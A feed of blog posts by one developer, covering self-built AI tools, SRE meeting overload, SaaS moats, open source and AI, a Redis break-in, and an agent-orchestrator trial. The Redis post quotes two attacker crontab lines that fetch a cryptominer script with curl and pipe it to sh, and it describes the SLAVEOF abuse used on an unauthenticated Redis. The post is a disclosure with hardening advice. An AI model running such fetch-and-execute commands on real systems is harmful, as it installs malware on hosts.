But here’s what I do know: while everyone’s stockpiling survival advice, I’ve been using those same AI tools to eliminate $200/month in software subscriptions. Tools I was paying for six months ago? I own them now. Forever. Zero recurring cost.

Same technology. Completely different mindset.

Let me show you what I mean.

The Batch PDF Processor I Built Instead of Uploading 50 Files

I had 50 research papers to process. Extract abstracts, pull out key findings, grab any data tables, save everything as searchable markdown.

Sure, Claude can read a PDF. One at a time. Upload, wait, copy the output, upload the next one, repeat 49 more times.

Old me would’ve done exactly that. Or Googled “batch PDF extraction tool,” found something that charges per page, done the math, decided it wasn’t worth it, and then manually uploaded 50 files anyway.

New me? I built a script.

Ninety minutes later, I had a skill that loops through a folder, extracts text and tables from each PDF using PyMuPDF, summarizes each one, and saves structured markdown files. Point it at a folder, go make coffee, come back to 50 organized summaries.

> Process all PDFs in ~/research/papers
[loops through 50 files]
[extracts + summarizes each]
[saves to ~/research/summaries/]

No uploading files one by one. No copy-paste marathon. No usage limits. Runs locally, so nothing leaves my machine.

The tool isn’t “PDF extraction”: Claude already does that. The tool isautomation. Batch processing. The boring plumbing that turns a manual 3-hour task into a 5-minute one.

The Video Transcription Pipeline That Changed How I Learn

I’m an infoproduct junkie. Courses, masterclasses, workshops: if someone’s selling knowledge in video form, I’ve probably bought it. My Teachable and Gumroad purchase history is embarrassing. Hours and hours of content sitting in various dashboards, waiting to be watched.

Old me would take notes while watching. Pause, scribble, play, pause, scribble. Retain maybe 30% of it. Forget the rest within a week.

New me? I feed the videos to my video-distill skill. It transcribes everything with Whisper, distills it into readable chapters with Claude, and exports to EPUB.

Two hours of course video becomes a 12,000-word mini-book on my Kindle that I can search, highlight, and reference forever.

Build time: 2 hours.

Previous cost: $50-200 per course for transcription services (or just… not having transcripts and forgetting everything).

The ROI on courses went from “eh, probably worth it” to “this is a no-brainer.”

The Pattern Nobody Wants to Admit

Here’s what I noticed while building these:

Every AI SaaS is a thin wrapper around the same AI you already have access to.

Batch file processing? A loop + Claude.
Video transcription? Whisper + Claude.
Content research? Web fetch + Claude.
Cross-posting? Template formatting + Claude.
Writing assistant? Prompt engineering + Claude.

The “product” is convenience packaging. A nice UI, hosting, a payment gateway, customer support. Sometimes that’s worth paying for.

But most of the time? You can build 80% of what you need in under two hours.

I’ve done this six times now. Total build time: about 14 hours. One weekend, spread across a few months.

Total monthly savings: $199.

Total annual savings: $2,388.

Tools I now own forever: 6.

The Real Question Nobody’s Asking

While everyone argues about whether AI will take their job, here’s what I’m thinking:

It’s not AI vs humans. It’s humans with AI vs humans without.

The lawyer who refuses to use AI for contract review loses to the lawyer who uses it and handles 5x more clients.

The developer who doesn’t use AI for code generation loses to the developer who does and ships features in days instead of weeks.

The writer who thinks AI is “cheating” loses to the writer who uses it for research and drafts 10x more content.

The people who lose their jobs to AI won’t be the ones whose work AI can theoretically do.

They’ll be the ones whodidn’t use AI and got outpaced by someone who did.

What I Actually Do Instead of Panicking

I audit my subscriptions. Every few months, I go through my recurring charges and ask: “Is this just an AI wrapper?”

If yes, I build a replacement. If the replacement covers 80% of my use cases, I cancel the subscription.

Here’s my current hit list:

Batch PDF processing: replaced manual uploads with pdf-reader skill (90 min)
Video transcription: replaced $50-200/course services with video-distill skill (2 hours)
Ebook formatting: replaced $30/book services with epub-builder skill (1 hour)
Content research: replaced $29/mo tools with compose skill (3 hours)
Cross-posting: replaced $50/mo tools with distribute skill (2 hours)
Writing assistant: replaced $20/mo Sudowrite etc with fiction-writer skill (4 hours)

Not everything is worth building. QuickBooks? Keep paying. Complex Zapier automation with 50 integrations? Probably keep paying. Hosted databases? Definitely keep paying.

But simple AI wrappers that just call Claude with a prompt and charge you monthly for it? Those are dying. You can own that.

This Is What Leverage Actually Looks Like

When you own your tools, you can modify them to fit your exact workflow. Combine them in ways SaaS products can’t. Build competitive advantages nobody else has.

Mydistribute skill cross-posts to five platforms in one command. Most people manually post to each: different formatting, different copy, different everything. That’s 30 minutes per post. I do it in 2 minutes.

Over a year, that’s 50+ hours saved. For one skill.

Myvideo-distill skill turns courses into searchable mini-books. Most people watch courses once and forget 80% of it. I have permanent reference material I can search and review anytime.

This is how one-person operations beat ten-person teams. Not by working harder. By owning tools that make you 10x faster.

Two Paths

The AI revolution is here. Not coming. Here.

Path A: Read about how AI is going to disrupt your career. Worry about it. Prepare for the worst. Maybe it happens, maybe it doesn’t. Either way, you spent months anxious instead of building.

Path B: Use AI to eliminate expenses, build tools, ship faster, own your stack. If disruption comes, you’re already leveraged. If it doesn’t, you still saved $2,400/year and got 10x faster.

I’m on Path B.

I built six skills in 14 hours. I save $200/month. I own tools that do exactly what I need, with no usage limits, no pricing tiers, and no risk of some startup getting acqui-hired and shutting down my workflow.

And I’m shipping four SaaS products while working two day jobs, because I have the leverage to do it.

You can panic, or you can build.

I’m building.

If You Want to Start

Here’s the playbook I use every time.

Step 1: Pick Your Target

Start with something you use weekly but don’t need enterprise features for. The sweet spot is tools where you’re paying for convenience, not capability.

Good first targets:

Batch processing workflows (loop through files, process each, save outputs)
Video/audio transcription (Whisper is free and runs locally)
Content research and brainstorming (web scraping + Claude)
Grammar/style checking (Claude prompts replace Grammarly)
Format conversion pipelines (markdown → EPUB, video → transcript → summary)

Bad first targets:

Accounting software (compliance, integrations, audit trails)
Complex multi-step automation with 20+ triggers
Anything requiring hosted infrastructure you don’t want to manage
Real-time collaboration tools (Google Docs, Figma)

Step 2: Describe the Workflow, Not the Tool

Don’t say “build me a transcription tool.” Say “I have 20 course videos. I want to transcribe each one, distill the key points, and save them as markdown files organized by chapter.”

The more specific you are about youractual workflow, the better the tool fits. You’re not building a generic SaaS: you’re building exactly what you need.

Step 3: Start Ugly, Iterate Fast

Your first version will be rough. That’s fine.

My video transcription pipeline started as a janky script that choked on long files. I fixed the edge cases as I hit them. Now it handles 3-hour lectures without breaking a sweat.

Don’t try to build the polished SaaS version. Build the “works for my specific use case” version. That takes 90 minutes, not 90 days.

Step 4: The 80% Test

Run your homegrown tool alongside the paid one for 30 days. Track when you reach for the paid tool instead.

If your skill handles 80% of cases, cancel the subscription. The remaining 20%? Either iterate on your skill or accept the occasional manual workaround.

Perfect is the enemy of $X/month forever.

Step 5: Compound It

Once you’ve built one, you’ll notice patterns. The same techniques: file handling, API calls, text processing, output formatting: show up everywhere.

Your second skill takes half the time. Your fifth takes 20 minutes.

This is how you end up owning your entire stack without spending months building it.

The Prompt That Starts Everything

If you’re using Claude Code or similar:

I want to build a tool that [specific workflow].
I currently do this by [current manual process or paid tool].
My input is [what you're working with].
I want the output to be [format and destination].
What's the simplest way to build this?

Then iterate. The AI will ask clarifying questions, suggest approaches, write code. You test, refine, test again.

Two hours later, you own something you would’ve rented forever.

The people who win the next decade won’t be the ones who worried about AI disruption.

They’ll be the ones who used AI to build tools, eliminate costs, and move faster than everyone else.

Don’t rent your stack. Own it.

P.S.: The AI wrapper economy is dying. Every “AI-powered” tool that’s just a UI around Claude or GPT is on borrowed time. The moment users realize they can build 80% of that themselves, the subscription revenue evaporates. If you’re building an AI SaaS, make sure your value is in the 20% that can’t be replicated in two hours.

]]>

How to Escape the SRE Meeting-Industrial Complex

Lakshmi Narasimhan — Wed, 11 Feb 2026 00:00:00 +0000

Monday morning. I opened Slack at 8:30. By 8:47 I had four meeting invites: a standup, a sync, a pre-mortem for a system that hasn’t broken yet, and a “quick alignment call” about the alignment call we had on Friday.

By 11am I’d spent two and a half hours talking about reliability. I’d spent zero hours improving it.

Someone on r/devops posted this week: “My team should be renamed to TalkOps.” Ninety-nine percent upvote ratio. Every SRE on the planet felt that in their chest.

The Meeting-Industrial Complex

Here’s what happens in platform engineering and SRE orgs at scale. The work is invisible. Nobody sees the deployment pipeline until it breaks. Nobody notices the monitoring until it doesn’t fire. The only proof that your team exists is… meetings.

So meetings multiply. Not because they’re useful, but because they’re visible. Your manager needs to justify headcount. Your team needs to “align” with five other teams. Every incident spawns a post-mortem, every post-mortem spawns action items, every action item spawns a planning meeting, and the planning meeting spawns a follow-up sync to check on the action items from the post-mortem about the incident that happened because nobody had time to do deep work because they were in too many meetings.

The recursion is beautiful, in a terrible way.

Deep Work Is the Actual Product

I’ve been a Principal SRE for long enough to have an opinion that would get me in trouble at most companies:most reliability improvements happen in 2-hour blocks of uninterrupted focus, not in 30-minute standups.

The monitoring rule that catches the subtle memory leak? That took a quiet afternoon staring at Grafana dashboards. The deployment pipeline fix that cut rollback time from 20 minutes to 90 seconds? That was a Saturday morning when Slack was silent.

The real work — the stuff that actually moves your error budget in the right direction — requires the kind of concentration that evaporates the instant someone says “can I get 15 minutes?”

Fifteen minutes is never fifteen minutes. It’s five minutes of context-switching in, fifteen minutes of meeting, and thirty minutes of trying to remember what you were doing before the meeting. That’s fifty minutes gone for fifteen minutes of “alignment.”

The Side Project Tax

Here’s where it gets personal. If you’re an SRE who also builds on the side — SaaS, open source, writing, whatever — the meeting-industrial complex doesn’t just eat your work day. It eats your creative energy.

I leave my day job some days having produced nothing but words. Spoken words. Words in Zoom calls. Words in Slack threads about Zoom calls. By the time I sit down to work on my own projects, my brain is cooked.

Not tired-from-solving-hard-problems cooked. Tired-from-performing-productivity cooked. There’s a difference. One is the good kind of exhaustion. The other is the kind where you stare at your side project and think “I’ll just do this tomorrow” for the 47th consecutive day.

The cruel irony: the skills that make you good at SRE — systems thinking, pattern recognition, automation instinct — are exactly the skills you need for building products. But TalkOps burns through your cognitive budget before you can apply those skills to anything that’s actually yours.

Fighting Back (Without Getting Fired)

You can’t just decline every meeting. I’ve tried. People notice. “Not a team player” shows up in your review. The trick is strategic visibility reduction.

1. The Async Post-Mortem

Most post-mortems don’t need a meeting. They need a document. Write the timeline, the root cause, the action items. Share it. Let people comment asynchronously. Reserve the live meeting for cases where there’s genuine disagreement about the fix.

I started doing this two years ago. Saved roughly 3 hours a week. Nobody complained. Several people thanked me.

2. The Office Hours Model

Instead of being available for “quick syncs” all day, block two hours for office hours. “Need my input? Come between 2-4pm Tuesday and Thursday.” Outside those hours, I’m heads-down. Slack messages get a response within 4 hours, not 4 minutes.

This feels rude until you realize that every senior engineer at a company like Google does exactly this. They just don’t announce it.

3. The 1-Page RFC

Half the planning meetings exist because nobody wrote down what they want to build. A 1-page RFC — problem, proposed solution, tradeoffs, timeline — kills 3 meetings. Write it before the meeting gets scheduled. Share it. Cancel the meeting. “I think the RFC covers it. Drop comments if anything’s unclear.”

4. Protect Your First 2 Hours

No meetings before 10:30. Not negotiable. Those first morning hours are when your brain is sharpest. Using them for standups is like using a surgical laser to heat soup.

If your standup is at 9am, that’s not a standup. That’s a productivity assassination. Push for async standups (Slack bots work fine) or at least move it to after lunch when everyone’s already in low-focus mode.

5. Make the Work Visible Without Meetings

The root cause of TalkOps is invisible work. Fix the visibility problem and you fix the meeting problem.

Weekly automated reports. Dashboards in shared channels. Monthly “here’s what platform eng shipped” newsletters. Make the work visible on your terms, in your format, on your schedule. If people can see what you’re doing, they stop scheduling meetings to ask.

The Real Output

Every hour you reclaim from TalkOps is an hour you can spend on actual reliability work. Or actual side project work. Or actual thinking, which is the scarcest resource in any engineering organization.

The r/devops thread had a comment that stuck with me: “By the time I get a quiet hour, I’m already drained.”

That’s not a scheduling problem. That’s a systems problem. And if there’s one thing SREs should be good at, it’s fixing systems.

Start with your own calendar.

]]>

The Real SaaS Moat AI Can't Replicate

Lakshmi Narasimhan — Mon, 09 Feb 2026 00:00:00 +0000

There’s a comment buried 14 levels deep inthis Hacker News thread about AI killing B2B SaaS. It has 37 upvotes and it’s the smartest thing I’ve read this year.

Here it is, paraphrased: “The real innovation of SaaS was laundering inaccessible open-source software into a format that doesn’t require transiting git. The hard part was never the code. The hard part was that git sucks.”

I laughed. Then I stopped laughing because it’s devastatingly correct.

The Git Laundering Machine

Think about the most profitable SaaS businesses in technology. Seriously, list them.

AWS? That’s Linux, KVM, and Xen behind a billing dashboard. Heroku was git-push-to-deploy because deploying was too hard. Vercel is the same thing for Next.js. MongoDB Atlas is MongoDB without the ops. Redis Cloud is Redis without the YAML. Supabase is Postgres without the DBA.

Every single one of them is a factory that converts something freely available on GitHub into something you can pay for on a website.

The commenter was right. These companies didn’t build moats with proprietary technology. They built moats by standing between users and git. Their value proposition, stripped to the studs, is: “You don’t have to clone a repo.”

That’s a $500 billion industry built on the fact thatgit clone is scary.

LLMs Just Killed the Middleman

Here’s where the “AI is killing SaaS” thesis gets real.

When a CTO says “can we build this internally?”, the old answer was: “Technically yes, but you’d need 3 engineers, 6 months, and ongoing maintenance. Just buy the SaaS.”

The new answer: “ChatGPT set it up in 20 minutes. It reads from the same open-source code the SaaS vendor uses. It runs on our infrastructure. There’s no monthly bill.”

LLMs do exactly what SaaS companies do — they take inaccessible open-source software and make it usable by normal humans. They just skip the subscription.

The git laundering machine now has competition. And the competitor works for free.

What Actually Survives

So is B2B SaaS dead? No. But the moat map just got redrawn.

Here’s what doesn’t survive:any SaaS whose primary value is “we set it up so you don’t have to.” Deployment wrappers, config GUIs, managed hosting for commodity databases — all of this is getting compressed.

An HN commenter who manages teams put it bluntly: “Management doesn’t want to be responsible for bespoke internal tools.” That’s real. But it’s a shrinking moat. Today’s management doesn’t want to be responsible. Tomorrow’s management grew up with ChatGPT and doesn’t see internal tooling as risky.

Here’s what survives:

Data. If your SaaS accumulates proprietary data over time — customer behavior patterns, industry benchmarks, network effects — that’s a moat AI can’t replicate. A new LLM-generated tool starts with zero data. Your SaaS has three years of it.

Compliance and trust. SOC 2, HIPAA, GDPR certification takes time and money. “ChatGPT built it” doesn’t pass an enterprise security audit. Yet.

Workflow lock-in. Not the software itself, but the habits. Slack isn’t hard to replace technically. It’s hard to replace because your whole company’s muscle memory lives there.

Network effects. Figma isn’t valuable because of the rendering engine. It’s valuable because your designers, developers, and product managers are all in the same file. That’s a moat no amount of vibe coding can replicate.

The specification itself. Here’s the contrarian take within the contrarian take: as code becomes commodity, the spec becomes the product. The companies that survive aren’t the ones that write the best code. They’re the ones that understand the problem deeply enough to specify what “right” looks like. Everyone else is just a GPT wrapper with a landing page.

The Indie SaaS Playbook Changes

If you’re building SaaS solo — and if you’re reading this newsletter, you probably are — the implications are brutal and clear.

Full disclosure: I built a product that does exactly this.Supabyoi deploys Supabase for you. By my own thesis, that’s a shrinking moat. I’m writing this post partly because I’m living the question: evolve or get compressed.

Stop building tools. Start building data flywheels.

A CRUD app with a nice UI is now a weekend project for anyone with ChatGPT. A system that gets smarter with every user interaction is still a real business.

Stop selling setup. Start selling ongoing value.

“We deploy Postgres for you” is dying. “We analyze your Postgres performance patterns across 10,000 databases and tell you what’s about to break” is thriving.

Stop competing on features. Start competing on understanding.

The SaaS products that survive AI commodification will be the ones that understand their customers’ problems better than a general-purpose LLM ever could. Domain expertise is the last moat.

The $500 Billion Question

The HN thread devolved into the usual “AI is overhyped” vs. “AI changes everything” tribal warfare. But that one comment, buried 14 levels deep, cut through all of it.

The SaaS moat was never the software. It was the fact that software was hard to access. That moat is evaporating.

What’s left is data, trust, network effects, and deep domain understanding.

Build your SaaS around those. Or enjoy competing with a free chatbot.

]]>

Open Source Is Starving While AI Makes Coding Free

Lakshmi Narasimhan — Tue, 03 Feb 2026 00:00:00 +0000

Developer costs are plummeting toward zero. AI coding agents can scaffold an app in minutes. A solo founder with Claude can ship what used to take a team of five.

And yet, open source is in crisis.

Maintainers are burning out at record rates. Critical infrastructure projects survive on the goodwill of one or two exhausted volunteers. The xz backdoor wasn’t an anomaly — it was a symptom of a system running on fumes. The “one random person in Nebraska” meme stopped being funny years ago.

We have the cheapest labor in the history of software, and the projects that hold up the internet are still starving for contributors.

How?

The Founding Myth

In 1997, Eric Raymond publishedThe Cathedral and the Bazaar, the essay that became open source’s origin story. The argument was simple: software built like a cathedral — centrally planned, tightly controlled, released when perfect — loses to software built like a bazaar — messy, open, iterated in public by a swarm of contributors.

Linux beat the cathedral. The bazaar won. Raymond’s most famous line became gospel: “Given enough eyeballs, all bugs are shallow.”

Twenty-nine years later, the eyeballs are disappearing. The bazaar is starving. And a new kind of cathedral has risen — one Raymond never imagined.

Cheap Labor Doesn’t Flow to Maintenance

Here’s the disconnect: AI-generated labor isn’t flowing to maintenance. It’s flowing to creation.

Vibe coding doesn’t fix bugs in abandoned logging libraries. It generates new apps. Agents build what they’re told, and nobody tells them “go triage issues on this unglamorous project that 40,000 packages depend on.”

Raymond’s bazaar worked because contributors had intrinsic motivation — they scratched their own itch. Agents don’t have itches. They have prompts.

The result: an explosion of new software built on a foundation that’s slowly rotting.

Linus’s Law Is Breaking

Raymond’s key insight was that open development creates a natural immune system. Bugs get caught because many eyes are watching. The bazaar is self-correcting.

This assumed two things that were true in 1997 and are increasingly false today:

First, that someone wrote the code. Vibe-coded software often has no human author who deeply understands it. The person who prompted it into existence may not be able to read it. The “author” is a model trained on the commons, producing plausible-looking code that works until it doesn’t. I’vewritten about this failure mode — code that compiles, passes tests, and is subtly, catastrophically wrong.

Second, that someone reads the code. Open source review depends on humans who care enough to look. But when code is generated at machine speed, the review bottleneck becomes catastrophic. Maintainers are already drowning in AI-generated pull requests — superficially clean, structurally hollow. The immune system is being overwhelmed not by attackers, but by well-meaning slop.

“Given enough eyeballs, all bugs are shallow” only works if the eyeballs are open.

The New Cathedral

Raymond’s cathedral was Microsoft. Proprietary, closed, top-down. The bazaar beat it because openness was a structural advantage — more contributors, faster iteration, better feedback loops.

But look at what the bazaar runs on today.

Every vibe coder, every AI-assisted open source contributor, every agent spinning up code in a terminal — they’re all downstream of foundation models built inside the most cathedral-like institutions imaginable. Anthropic, OpenAI, Google DeepMind — these are cathedrals that would make 1990s Microsoft blush. Billions in compute, proprietary training data, closed weights, trade secrets wrapped in safety rhetoric.

The bazaar didn’t defeat the cathedral. It moved in upstairs.

Open source in 2026 means building with tools you can’t inspect, trained on data you can’t audit, controlled by companies whose incentives you can’t verify. The irony would make Raymond’s head spin: the most “open” era of software creation runs entirely on the most closed infrastructure ever built.

Vibe Coding: Raymond’s Dream or Nightmare?

“Release early, release often.” Raymond preached this as the bazaar’s core advantage. Vibe coding takes it to its logical extreme — release in minutes, iterate in seconds, ship before lunch.

But Raymond’s version had a crucial qualifier nobody quotes: rapid releases were supposed to come withlistening to your users. The feedback loop was the point. Ship fast so you can learn fast.

Vibe coding often skips the loop. Ship fast because shipping is easy. If it breaks, generate a new one. Software becomes disposable. Why debug when you can re-prompt?

This creates a bizarre inversion. The original bazaar was messy butconvergent — many contributors pushing toward better software over time. The vibe-coded bazaar is messy anddivergent — infinite forks, infinite rewrites, nothing accumulating into lasting infrastructure.

Raymond imagined a thousand people improving one thing. We got one person generating a thousand things.

Does Open Source Even Matter the Same Way?

Here’s the uncomfortable question: if anyone can vibe-code a replacement for your library in an afternoon, what does “open source” even mean?

The traditional argument was access. You shouldn’t have to pay Microsoft for a compiler. You shouldn’t be locked into Oracle’s database. Open source was freedom from vendor dependence.

But when the vendor is an AI model and the product is generated on demand, the bottleneck shifts. You’re not locked into specific software — you’re locked into thecapability to generate software. The dependency moved up a layer of abstraction.

Open source used to mean: “here’s the code, do what you want.” The new version might mean: “here’s the model weights, do what you want.” And by that standard, most of the AI industry is firmly in cathedral territory.

What Raymond Got Right (That Still Holds)

It’s tempting to write the obituary for the bazaar. Don’t.

Raymond’s deepest insight wasn’t about code — it was aboutcoordination. The bazaar demonstrated that loose networks of motivated people could outperform rigid hierarchies. That insight is more relevant than ever.

The projects that will thrive in the agent era won’t be the ones with the most AI-generated PRs. They’ll be the ones that figure out how to coordinate human judgment with machine labor. Someone still has to decide what’s worth building. Someone still has to say “this PR is slop, reject it.” Someone still has to maintain taste.

The bazaar’s immune system isn’t dead — it just needs to evolve. Instead of “many eyes on the code,” we need “many minds on the direction.” Maintainers become curators. Contributors become reviewers. The scarce resource isn’t writing code anymore. It’s knowing which code to keep.

Raymond was right that openness wins. He was right that central planning can’t compete with distributed intelligence. He was right that scratching your own itch produces better software than building to spec.

He just couldn’t have predicted that the itch would be scratched by a machine that doesn’t know what itching feels like.

The Cathedral and the Bazaar assumed humans on both sides of the screen. We’re entering an era where that assumption breaks down. The principles survive. The implementation needs an upgrade.

What do you think — is the bazaar adapting or dying? Reply and tell me.

]]>

Your Redis Is Probably Naked Right Now

Lakshmi Narasimhan — Mon, 02 Feb 2026 00:00:00 +0000

Last month I wrote aboutfinding a cryptominer in a client’s Kubernetes cluster. CVSS 10. Next.js RCE. Classic supply chain story. I got to play detective, feel smart, and write about it.

This month the cryptominer came forme.

Saturday night. Tamil movie with my wife. Sentry pings: “Write against read-only replica.” Seventy-four times in two hours.

My first instinct was to ignore it. Background task failures. Probably a blip. But seventy-four errors is not a blip. That’s someone inside your house rearranging the furniture.

“Two minutes,” I told my wife. (Spoiler: It was not two minutes.)

The Dumbest Thing I’ve Done in 20 Years

I run a scheduling service — Celery task queue backed by Redis, deployed with Kamal on a Hetzner VPS. Standard solo dev stack. The kind of thing I literally help people set up.

Here’s the confession: Redis port 6379 was exposed to the public internet. No password. No authentication. For months.

I copied a deployment config. It worked. I shipped. I moved on to the next feature. Sound familiar?

An automated scanner found it. At 22:25 UTC, IP46.19.137.194 sent aSLAVEOF command — telling my Redis to replicate from their command-and-control server. My Redis complied. For five seconds it went read-only, Celery workers started screaming, and the attacker planted two keys:

backup1: */2 * * * * root curl -fsSL http://natalstatus.org/ep9TS2/ndt.sh | sh
backup3: */4 * * * * root curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh

Cryptominer installation scripts. Every two minutes. On my $12/month VPS.

The payloads never made it to crontab — the attack chain didn’t complete. But they were sitting in my Redis like loaded guns.

The Twenty-Minute Fix

Remove the public port mapping. Add a password. Done.

# Before: come one, come all
redis:
port: 6379
cmd: redis-server --appendonly yes
# After: invitation only
redis:
cmd: redis-server --appendonly yes --requirepass <32-char-password>

Thenufw deny 6379/tcp, block the attacker IPs, delete the malicious keys. Sentry goes quiet. Movie resumes.

Twenty minutes to fix. Thirty seconds to have prevented.

The Pattern I Keep Seeing

Here’s what gets me. Last month it was a client — Next.js RCE, CVSS 10, dependency they forgot to update. This month it’s me — a port mapping I forgot to question.

Neither attack was sophisticated. Both exploited the gap between “it works” and “it’s secure.” The gap that widens every time you’re shipping fast, solo, with three other things on your plate.

When you’re the entire engineering team, you’re also the entire security team. There’s no infra review. No SOC watching at 10 PM. It’s you, your monitoring, and whatever defaults you didn’t question.

I’ve been doing infrastructure for twenty years, and I still shipped an unauthenticated Redis to production. Because the config worked and I had features to build.

This Is Why I’m Building VMKit

Every time I deploy something to a VPS, I’m making fifty decisions that could go wrong. Port mappings. Firewall rules. Authentication. TLS. Container networking. Every one of them is a potential Saturday night incident.

VMKit is my answer to this. Railway-like deployment experience on your own infrastructure — but with sane defaults baked in. No exposed ports unless you explicitly ask for them. Internal networking by default. The kind of guardrails that would have prevented this entire post from existing.

Because solo devs shouldn’t have to be security experts to deploy a Redis instance. The tooling should handle the boring, critical stuff so you can focus on the features that actually make money.

I’m building it because I keep shooting myself in the foot, and I’m tired of the limp.

Your Five-Minute Audit

If you’re running Redis, PostgreSQL, MongoDB, or Elasticsearch on a VPS right now:

docker compose config | grep -i port — anything bound to0.0.0.0? Kill it unless it needs public access.
Add authentication to everything. Redis doesn’t require a password by default. This is unhinged, but here we are.
Set up Sentry or equivalent. Without error monitoring, I’d have a cryptominer running and a confused electricity bill.
ufw status. If the output surprises you, that’s your sign.
Default deny. Allow only 22, 80, 443. Everything else is closed until you need it.

The attacker didn’t use a zero-day. They used Shodan, an open port, and my negligence. That’s the most common attack vector for solo-deployed SaaS, and it’s entirely preventable.

Don’t be me on a Saturday night. Five minutes. Audit your configs.

Your future self — and your wife — will thank you.

]]>

What Happens When You Let 6 AI Agents Write Code at the Same Time

Lakshmi Narasimhan — Thu, 29 Jan 2026 00:00:00 +0000

Steve Yegge releasedGas Town on January 1st, 2026. An agent orchestrator for Claude Code. Multiple AI agents working in parallel, coordinated through git-backed task tracking, communicating via an internal mail system. The pitch: stop babysitting one Claude session. Run twenty.

His first rule: don’t use this in its first weeks.

I used it in its first week.

Why I Couldn’t Wait

I work across four projects solo. SaaS products, open source tools, content — the usual indie dev plate-spinning. Every Claude Code session I run is one session I’m not running somewhere else. The promise of parallel agents shipping code while I context-switch between projects was too compelling to resist.

So I installed Gas Town, added my projects as “rigs,” groomed six tasks into “beads,” and spawned six workers simultaneously.

My M2 MacBook responded by becoming a space heater that couldn’t render a terminal.

What Gas Town Actually Is

Before I explain what went wrong, let me translate the concepts. Gas Town uses Mad Max-inspired naming, which is either charming or maddening depending on your patience.

Town — Your workspace root (~/gt/). Think of it as the factory floor where everything lives.

Rig — A project container. Each of your repos becomes a rig inside the town. Not a git clone itself, but a wrapper that manages clones, worktrees, and workers for that project.

Beads — A git-backed issue tracker, also built by Steve. Every task, bug, or feature is a “bead” with a unique ID likesupabyoi-9ue. They live in your repo’s.beads/ directory, committed alongside your code. Dependencies between beads create a task graph. I wrote aboutwhy this matters — AI agents lose all context when sessions end. Beads solve this by making work persist in git. This is the piece that genuinely works well.

Mayor — The global coordinator agent. You talk to the mayor, the mayor dispatches work. It sits above all rigs and orchestrates across projects.

Polecat — An ephemeral worker agent. Gets spawned with a task, works in its own git worktree, signals completion, gets cleaned up. The grunt labor.

Witness — Per-rig monitor that watches polecats. Detects stuck workers, nudges them, handles cleanup.

Deacon — Town-level watchdog that patrols all rigs. Monitors witnesses, refineries, everything.

Refinery — Per-rig merge queue processor. When a polecat finishes, the refinery handles the PR/merge workflow.

Convoy — Batch tracker for related work. Group six beads into a convoy, dispatch them, track progress as a unit.

Molecules — Reusable workflow templates. Formula defines the pattern, molecule is the running instance.

That’s ten concepts before you write a line of code. Steve’s mental model is a steam engine: agents are pistons, work flows through hooks, everything runs on the “Propulsion Principle” — if you find work on your hook, you execute immediately.

The architecture borrows from Erlang’s supervisor trees(I think) — a pattern from telecom systems where processes are organized in a hierarchy. Each parent monitors its children: if a child crashes, the parent restarts it. In Gas Town, the Deacon watches Witnesses, Witnesses watch Polecats, and failures cascade upward. This is a proven pattern that runs phone switches serving millions of calls. The catch: Erlang processes are lightweight (microseconds to spawn, kilobytes of memory). Claude Code sessions are heavy (seconds to spawn, gigabytes of memory). When each “process” is a full AI session burning tokens, the economics of cheap failure recovery invert.

What Actually Happened

Week One: The Learning Curve

The first session was pure orientation. I needed Claude to explain Gas Town to mewhile inside Gas Town. The cognitive overhead of mapping “polecat” to “worker” and “rig” to “project” consumed real mental energy that should have gone to actual work.

The 80/20 path is supposed to be:

gt up # Boot everything
gt mayor attach # Talk to the mayor

In practice,gt up failed because the bd (beads daemon) version check timed out. This led me down a rabbit hole patching the version comparison in Go — changingtime.Equal() totime.Unix() because JSON serialization was losing nanosecond precision. I was debugging the orchestrator instead of using it.

Week Two: Six Polecats and a Space Heater

Once things stabilized, I got ambitious. Six beads groomed, six polecats spawned:

gt sling supabyoi-9ue supabyoi
gt sling supabyoi-abc supabyoi
# ... four more

Each polecat is a full Claude Code session in its own tmux pane with its own git worktree. Six of those plus a mayor, witnesses, refineries, deacons, and multiple bd daemons meant my M2 was running 20+ processes competing for resources.

The system didn’t crash. It degraded. Commands took minutes to respond. Shell execution broke mid-session. I had to kill processes manually and nuke the setup.

But here’s the thing — that wasn’t entirely Gas Town’s fault. Six concurrent Claude sessions will hammer any laptop. The real issue was that Gas Town spawned orphaned daemon processes that accumulated across restarts. I found six bd daemons running simultaneously, plus stuckbd mol burn processes from days ago that never cleaned up.

The Doctor Loop

Gas Town has agt doctor command — a health check that reports errors and warnings. I ran it constantly.

First run: 1 error, 11 warnings. Aftergt doctor --fix: 4 fixed, 7 remaining. After restart: new errors. After bd daemon restart: timeout errors. After updating bd from v0.47.0 to v0.47.2: different errors.

Each fix revealed the next problem. The mayor’sCLAUDE.md was 280 lines (should be under 30). Environment variables from dead sessions broke prefix routing. Beads databases pointed to wrong paths. Symlinks needed codesigning to avoid macOS killing the binary.

It felt less like using a tool and more like being a system administrator for a tool.

What Genuinely Works

Beads: The git-backed issue tracker is solid. Creating tasks, tracking dependencies, finding ready work — this layer does its job. It survived every crash and restart because it’s just files in git. Steve built Beads as a standalone tool before Gas Town, and it’s the strongest foundation in the stack.

Worktree isolation: Each worker gets its own git worktree. No merge conflicts between parallel work. Clean separation. This is the right primitive.

The hub/worker model: Having a coordinator dispatch tasks to isolated workers is correct. The mental model of “groom beads, dispatch to workers, merge results” is sound.

gt doctor: Despite the loop, having a comprehensive health check that can auto-fix common issues is genuinely useful infrastructure.

What Doesn’t Work Yet

Daemon management: Orphaned processes are the #1 pain. bd daemons accumulate, stuck processes never clean up, version checks timeout. This is being fixed — v0.5.0 added process group killing — but it was brutal in weeks one and two.

The naming: I’m not trying to be uncharitable. But “polecat” adds zero information over “worker.” “Molecule” adds confusion over “workflow.” Every conversation about Gas Town requires a glossary. When a Hacker News commenter pointed out the irony — Steve Yegge wrote “Execution in the Kingdom of Nouns” mocking over-abstraction — it stung because it’s accurate.

Human as dispatcher: This is the core limitation. Despite all the automation, the mayor waits for you. Issue #694 on GitHub tracks exactly this: “Mayor lacks automated dispatch patrol molecule.” Community members built external cron scripts to poke the system. That tells you everything.

Cost and resource usage: Multiple reports of $100/hour token burn rates. DoltHub’s field test found none of the PRs were good enough to merge. The economics only work if the agents produce mergeable code reliably.

What I’m Building Instead

Gas Town taught me what I need. It also taught me what I don’t.

I wrote aboutwhy I’m building my own agent orchestrator. It’s calledwt. The core idea: keep the infrastructure that works (beads, worktrees, tmux), strip the ceremony that doesn’t (polecats, molecules, deacons, refineries).

Where Gas Town has ten concepts,wt has three:hub,worker,task. That’s it.

